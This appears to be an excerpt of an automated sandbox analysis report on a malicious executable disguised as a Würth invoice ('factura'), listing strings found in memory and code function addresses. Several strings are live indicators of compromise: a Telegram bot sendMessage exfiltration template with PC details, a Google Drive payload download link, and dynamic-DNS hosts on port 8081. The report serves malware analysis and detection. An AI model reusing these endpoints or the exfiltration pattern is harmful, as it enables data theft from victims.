Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Wuerth_factura_4052073226..exe, 00000000.00000002.2533263661.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Wuerth_factura_4052073226..exe, 00000000.00000000.2028021606.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000000.2528750158.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375C1000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375B2000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/=y
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277308268.0000000008870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM$LI
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZMlB
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/&
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/:
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM&export=download
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.000000003744D000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374BD000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.000000003744D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374BD000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375F2000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_004052CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052CB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040327D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_004032B2 lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004032B2
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A669B10 4_2_3A669B10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66F111 4_2_3A66F111
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66AE1F 4_2_3A66AE1F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A662918 4_2_3A662918
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66C618 4_2_3A66C618
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A668318 4_2_3A668318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A665219 4_2_3A665219
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66CAE0 4_2_3A66CAE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A660DE0 4_2_3A660DE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6687E0 4_2_3A6687E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A663FE8 4_2_3A663FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66F5E8 4_2_3A66F5E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A661FE8 4_2_3A661FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66B2E8 4_2_3A66B2E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6648F7 4_2_3A6648F7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A660DF0 4_2_3A660DF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6687F0 4_2_3A6687F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66DDF0 4_2_3A66DDF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6616FF 4_2_3A6616FF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A669AFF 4_2_3A669AFF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A666FFB 4_2_3A666FFB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A661FF8 4_2_3A661FF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66B2F8 4_2_3A66B2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A665FC7 4_2_3A665FC7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66B7C0 4_2_3A66B7C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6604C0 4_2_3A6604C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6636C8 4_2_3A6636C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66E2C8 4_2_3A66E2C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A669FC8 4_2_3A669FC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66F5D7 4_2_3A66F5D7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6604D0 4_2_3A6604D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6674D0 4_2_3A6674D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66CAD1 4_2_3A66CAD1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A663FD8 4_2_3A663FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66CFA7 4_2_3A66CFA7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A661BA0 4_2_3A661BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66A4A0 4_2_3A66A4A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66FAA0 4_2_3A66FAA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66B7AF 4_2_3A66B7AF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A662DA8 4_2_3A662DA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66CFA8 4_2_3A66CFA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6656A8 4_2_3A6656A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A668CA9 4_2_3A668CA9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66FAB0 4_2_3A66FAB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6674BF 4_2_3A6674BF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6656B8 4_2_3A6656B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A668CB8 4_2_3A668CB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66E2B8 4_2_3A66E2B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A661280 4_2_3A661280
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A669180 4_2_3A669180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66A48F 4_2_3A66A48F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A662488 4_2_3A662488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66BC88 4_2_3A66BC88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A667988 4_2_3A667988
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A664D89 4_2_3A664D89
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A66E790 4_2_3A66E790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A661B91 4_2_3A661B91
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A662D9C 4_2_3A662D9C
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A664D98 4_2_3A664D98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A667998 4_2_3A667998
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6870C0 4_2_3A6870C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A68D710 4_2_3A68D710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A684E60 4_2_3A684E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A681C60 4_2_3A681C60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A686A70 4_2_3A686A70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A68EE48 4_2_3A68EE48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A686440 4_2_3A686440
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A683240 4_2_3A683240
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A680040 4_2_3A680040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A684820 4_2_3A684820
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A681620 4_2_3A681620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A685E00 4_2_3A685E00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A682C00 4_2_3A682C00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A685AE0 4_2_3A685AE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6828E0 4_2_3A6828E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A683EC0 4_2_3A683EC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A680CC0 4_2_3A680CC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6854A0 4_2_3A6854A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6822A0 4_2_3A6822A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A683880 4_2_3A683880
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A680680 4_2_3A680680
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A686A80 4_2_3A686A80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A686760 4_2_3A686760
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A683560 4_2_3A683560
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A680360 4_2_3A680360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A684B40 4_2_3A684B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A681940 4_2_3A681940
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A686750 4_2_3A686750
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A686120 4_2_3A686120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A682F20 4_2_3A682F20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A684500 4_2_3A684500
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A681300 4_2_3A681300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6841E0 4_2_3A6841E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A680FE0 4_2_3A680FE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6857C0 4_2_3A6857C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6825C0 4_2_3A6825C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A680FD0 4_2_3A680FD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A686DA0 4_2_3A686DA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A683BA0 4_2_3A683BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6809A0 4_2_3A6809A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A685180 4_2_3A685180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A681F80 4_2_3A681F80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A698470 4_2_3A698470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A691CF0 4_2_3A691CF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69FB30 4_2_3A69FB30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69E870 4_2_3A69E870
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69B670 4_2_3A69B670
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A690040 4_2_3A690040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A699A50 4_2_3A699A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69CC50 4_2_3A69CC50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A691828 4_2_3A691828
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69B030 4_2_3A69B030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69E230 4_2_3A69E230
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A690006 4_2_3A690006
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69C610 4_2_3A69C610
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A699410 4_2_3A699410
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69F810 4_2_3A69F810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A691817 4_2_3A691817
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A691CE0 4_2_3A691CE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6904F9 4_2_3A6904F9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69F4F0 4_2_3A69F4F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6990F0 4_2_3A6990F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69C2F0 4_2_3A69C2F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69D8D0 4_2_3A69D8D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69A6D0 4_2_3A69A6D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69BCB0 4_2_3A69BCB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A698AB0 4_2_3A698AB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69EEB0 4_2_3A69EEB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A690E8A 4_2_3A690E8A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A690E98 4_2_3A690E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69A090 4_2_3A69A090
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69D290 4_2_3A69D290
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A691360 4_2_3A691360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A693360 4_2_3A693360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A699D70 4_2_3A699D70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69CF70 4_2_3A69CF70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A691351 4_2_3A691351
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69E550 4_2_3A69E550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69B350 4_2_3A69B350
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69C930 4_2_3A69C930
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A699730 4_2_3A699730
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A690508 4_2_3A690508
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69AD10 4_2_3A69AD10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69DF10 4_2_3A69DF10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69DBF0 4_2_3A69DBF0
